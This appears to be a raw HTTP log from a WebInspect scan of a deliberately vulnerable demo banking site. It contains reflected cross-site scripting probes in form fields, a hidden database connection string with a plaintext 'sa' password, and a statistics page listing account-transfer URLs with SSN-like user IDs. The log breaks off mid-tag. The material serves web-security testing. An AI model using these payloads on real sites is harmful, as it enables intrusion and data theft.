GET /join.asp?name=--><script>alert('XSS')</script>&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:42 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4006 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE="--><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
POST /pformresults.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/pindex.asp.bak Content-Length: 162 Content-Type: application/x-www-form-urlencoded Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=Joe&txtLastName=>"><script>alert('XSS')</script>
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:56:59 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 402 Content-Type: text/html Cache-control: private <html> <body> <P>The parameter "txtFirstName" = Joe</P> <P>The parameter "txtLastName" = >"><script>alert('XSS')</script></P><br> <P>The <b>hidden</b> parameter "txtHidden" = >"><script>alert('XSS')</script></P><br> <P>The <b>hidden</b> parameter "dbConnectString" = dbCCNumbers;uid=sa;password=scoobydo</P><br> <a href="pindex.asp">Click here to return to index</a> </body> </html>
GET /stats/stats.html HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Date: Thu, 04 Dec 2003 16:42:37 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Thu, 17 Jan 2002 04:54:47 GMT ETag: "2ed27316139fc11:8f6" Content-Length: 271575 <BODY BGCOLOR="#FFFFFF" BACKGROUND=""> <FONT FACE="Arial" COLOR="#000000"> <!-- WT_VERSION_2.0 --> <!-- WT_WINDOW_NAME>Building Summary Report...</WT_WINDOW_NAME --> <!-- WT_AUTO_EXIT --> <!-- WT_CRLF --> <!-- WT_CRLF --> <!-- WT_CRLF --> <!-- WT_CRLF --> <!-- WT_CRLF --> <!-- WT_CRLF --> <!-- WT_CRLF --> <!-- WT_CRLF --> <!-- WT_REPORT_TITLE>Webserver Statistics</WT_REPORT_TITLE --> <!-- WT_CRLF --> <!-- WT_LOG_TITLE>www.freebank.com</WT_LOG_TITLE --> <!-- WT_CRLF --> <!-- WT_CRLF --> <!-- WT_CENTER><CENTER>Prepared By:</CENTER></WT_CENTER --> <!-- WT_CRLF --> <!-- WT_AUTHOR>C:\Program Files\WebTrends Log Analyzer\wtm_log\wtm_log.ini</WT_AUTHOR --> <!-- WT_CRLF --> <!-- WT_COMPANY>C:\Program Files\WebTrends Log Analyzer\wtm_log\wtm_log.ini</WT_COMPANY --> <!-- WT_CRLF --> <!-- WT_CENTER><CENTER>on <!-- WT_DATE_TIME --></CENTER></WT_CENTER --> <!-- WT_CRLF --> <!-- WT_PAGEBREAK --> <!-- TABLE OF CONTENTS --> <!-- WT_TOC>Table of Contents</WT_TOC --> <!-- WT_CRLF --> <!-- WT_CRLF --> <!-- WT_TABLE_OF_CONTENTS --> <!-- WT_CRLF --> <!-- WT_PAGEBREAK --> <!-- Start Strip --> <CENTER><a href="http://www.freebank.com"> <img border=0 src="/images/freebank-logo2.gif" alt="Freebank"> </a></CENTER> <H1><CENTER><EM><WTHDR>Webserver Statistics</WTHDR></EM></CENTER></H1> <H2><CENTER>www.freebank.com</CENTER></H2> <!-- End Strip --> </BODY> <!-- ---- ---- --> <BODY BGCOLOR="#FFFFFF" BACKGROUND=""> <P><HR><P> <a name="GeneralStats"><!--General Statistics::General Statistics--></A> <!-- WT_H1>General Statistics</WT_H1 --> <!-- Start Strip --> <CENTER><TABLE BORDER=0 WIDTH=100%><TR> <TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"> <B>General Statistics</B></FONT></TD> <TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD> </TR></TABLE></CENTER> <!-- End Strip --> <P> <!-- WT_CRLF --> <FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->The User Profile by Regions graph identifies the general location of the visitors to your Web site. The General Statistics table includes statistics on the total activity for this web site during the designated time frame. <!-- /WT_DESCRIPTION --></FONT> <!-- WT_CRLF --> <!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR> <TD><IMG SRC="index00.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF --> <!-- ---- ---- --> <!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%> <TR BGCOLOR="#74C6F6"> <TD COLSPAN=2 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000"> <!-- WT_TABLE_STATS>2, 3.2, 2.8</WT_TABLE_STATS --> <!-- WT_NO_COLUMN_TITLES --> <CENTER><B>General Statistics</B></CENTER></TD></TR> <!-- WT_EXCEL_SHEET_NAME>General Statistics</WT_EXCEL_SHEET_NAME --> <TR BGCOLOR="#F0F0F0"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Date & Time This Report was Generated</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Saturday January 12, 2002 - 21:49:35</TD></TR> <TR BGCOLOR="#FFFFFF"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Timeframe</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">09/30/01 19:06:56 - 01/13/02 19:39:41</TD></TR> <TR BGCOLOR="#F0F0F0"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Number of Hits for Home Page</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">0</TD></TR> <TR BGCOLOR="#FFFFFF"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Number of Successful Hits for Entire Site</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">63026</TD></TR> <TR BGCOLOR="#F0F0F0"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Number of Page Views (Impressions)</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">16990</TD></TR> <TR BGCOLOR="#FFFFFF"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Number of User Sessions</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">10898</TD></TR> <TR BGCOLOR="#F0F0F0"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>User Sessions from United States</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">68.38%</TD></TR> <TR BGCOLOR="#FFFFFF"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>International User Sessions</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.01%</TD></TR> <TR BGCOLOR="#F0F0F0"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>User Sessions of Unknown Origin</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">27.59%</TD></TR> <TR BGCOLOR="#FFFFFF"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Average Number of Hits Per Day</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">600</TD></TR> <TR BGCOLOR="#F0F0F0"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Average Number of Page Views Per Day</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">161</TD></TR> <TR BGCOLOR="#FFFFFF"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Average Number of User Sessions Per Day</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">103</TD></TR> <TR BGCOLOR="#F0F0F0"> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Average User Session Length</B></TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">00:08:05</TD></TR> </TABLE></CENTER> <!-- WT_CRLF --> <!-- WT_PAGEBREAK --> <!-- ---- ---- --> ><HR><P> </BODY> <!-- ---- ---- --> <BODY BGCOLOR="#FFFFFF" BACKGROUND=""> <a name="TopDocuments"><!--Resources Accessed::Most Requested Pages--></A> <!-- WT_H1>Most Requested Pages</WT_H1 --> <!-- Start Strip --> <CENTER><TABLE BORDER=0 WIDTH=100%><TR> <TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Most Requested Pages</B></FONT></TD> <TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD> </TR></TABLE></CENTER> <!-- End Strip --> <P> <!-- WT_CRLF --> <FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the most popular web site pages and how often they were accessed. The average time a user spends viewing a page is also indicated in the table.<!-- /WT_DESCRIPTION --></FONT> <!-- WT_CRLF --> <!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR> <TD><IMG SRC="index01.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%> <TR BGCOLOR="#74C6F6"> <TD COLSPAN=6 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000"> <!-- WT_TABLE_STATS>6, .3, 2.7, .7 , .7 , .8 , .8</WT_TABLE_STATS --> <CENTER><B>Most Requested Pages</B></CENTER></TD></TR> <!-- WT_EXCEL_SHEET_NAME>Most Requested Pages</WT_EXCEL_SHEET_NAME --> <TR BGCOLOR="#D0D0D0"> <TD WIDTH=5%><B>&nbsp;&nbsp;&nbsp;</B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Pages</CENTER></B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Views</CENTER></B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>% of Total Views</CENTER></B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>User Sessions</CENTER></B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Avg. Time</CENTER></B></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/index.htm">http://www.freebank.com/index.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4736</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">27.87%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4305</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">00:01:41&nbsp;</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/forrest.asp">http://www.freebank.com/forrest.asp</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1033</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6.08%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">847</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">00:04:28&nbsp;</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_pics.htm">http://www.freebank.com/nbf_pics.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">804</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.73%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">723</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">00:01:53&nbsp;</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_controversies.htm">http://www.freebank.com/nbf_controversies.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">732</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.3%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">662</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">00:00:48&nbsp;</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_1875-07.htm">http://www.freebank.com/nbf_1875-07.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">629</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.7%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">598</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">00:03:34&nbsp;</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_essay_gl_01.htm">http://www.freebank.com/nbf_essay_gl_01.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">627</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.69%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">596</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">00:06:05&nbsp;</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_bye.htm">http://www.freebank.com/nbf_bye.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">620</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.64%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">597</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">00:02:30&nbsp;</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_more.htm">http://www.freebank.com/nbf_more.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">566</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.33%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">506</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">00:01:01&nbsp;</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_memorial.htm">http://www.freebank.com/nbf_memorial.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">560</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.29%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">517</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">00:01:04&nbsp;</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_speeches.htm">http://www.freebank.com/nbf_speeches.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">375</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.2%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">328</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">00:00:35&nbsp;</TD></TR> <TR BGCOLOR="#F0F0F0"> <TD>&nbsp;</TD> <TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Sub Total For the Page Views Above</B></TD> <TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10682</B></TD> <TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>62.87%</B></TD> <TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>N/A</B></TD> <TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>N/A</B></TD></TR> <TR BGCOLOR="#D0D0D0"> <TD>&nbsp;</TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total For the Log File</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>16990</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>100%</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>N/A</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>N/A</B></TD></TR> </TABLE></CENTER> <!-- WT_CRLF --> <!-- WT_PAGEBREAK --> ><HR><P> </BODY> <BODY BGCOLOR="#FFFFFF" BACKGROUND=""> <a name="TopBottom"><!--Resources Accessed::Least Requested Pages--></A> <!-- WT_H1>Least Requested Pages</WT_H1 --> <!-- Start Strip --> <CENTER><TABLE BORDER=0 WIDTH=100%><TR> <TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Least Requested Pages</B></FONT></TD> <TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD> </TR></TABLE></CENTER> <!-- End Strip --> <P> <!-- WT_CRLF --> <FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the least popular pages on your Web site, and how often they were accessed.<!-- /WT_DESCRIPTION --></FONT> <!-- WT_CRLF --> <!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%> <TR BGCOLOR="#74C6F6"> <TD COLSPAN=5 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000"> <!-- WT_TABLE_STATS>5, .3, 3.3, .8 , .8 , .8 </WT_TABLE_STATS --> <CENTER><B>Least Requested Pages</B></CENTER></TD></TR> <!-- WT_EXCEL_SHEET_NAME>Least Requested Pages</WT_EXCEL_SHEET_NAME --> <TR BGCOLOR="#D0D0D0"> <TD WIDTH=5%><B>&nbsp;&nbsp;&nbsp;</B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Pages</CENTER></B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Views</CENTER></B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>% of Total Views</CENTER></B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>User Sessions</CENTER></B></TD> </TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/acctxfer.asp?facctnum=&tacctnum=&userid=576-14-1122">http://www.freebank.com/acctxfer.asp?facctnum=&tacctnum=&userid=576-14-1122</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.01%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/acctxfer.asp?facctnum=&tacctnum=&userid=592-11-8393">http://www.freebank.com/acctxfer.asp?facctnum=&tacctnum=&userid=592-11-8393</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.01%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/stats/stats.html">http://www.freebank.com/stats/stats.html</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.02%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/stats/login.asp">http://www.freebank.com/stats/login.asp</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.02%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_heading.htm">http://www.freebank.com/nbf_heading.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.03%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A 